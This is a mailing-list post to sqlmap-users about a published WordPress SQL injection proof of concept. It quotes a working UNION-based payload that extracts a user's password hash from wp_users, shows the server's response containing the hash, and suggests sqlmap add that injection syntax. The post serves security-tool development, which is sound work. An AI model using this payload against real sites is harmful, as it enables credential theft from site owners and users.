Hello!
Playing around with the following vulnerabivlity:
http://www.exploit-db.com/exploits/35505/
Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
result in a response from the server with the hash of the first user:
1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
However, sqlmap only finds a time based injection. Looking at sqlmap
through burp, I do see sqlmap doesn't try an injection syntax like the one
used in the PoC. It may be useful to add a syntax of UNION (SELECT
CONCAT(blah, blah, blah) FROM blah).
Just a thought!
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
------------------------------------------------------------------------------
Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
from Actuate! Instantly Supercharge Your Business Reports and Dashboards
with Interactivity, Sharing, Native Excel Exports, App Integration & more
Get technology previously reserved for billion-dollar corporations, FREE
http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
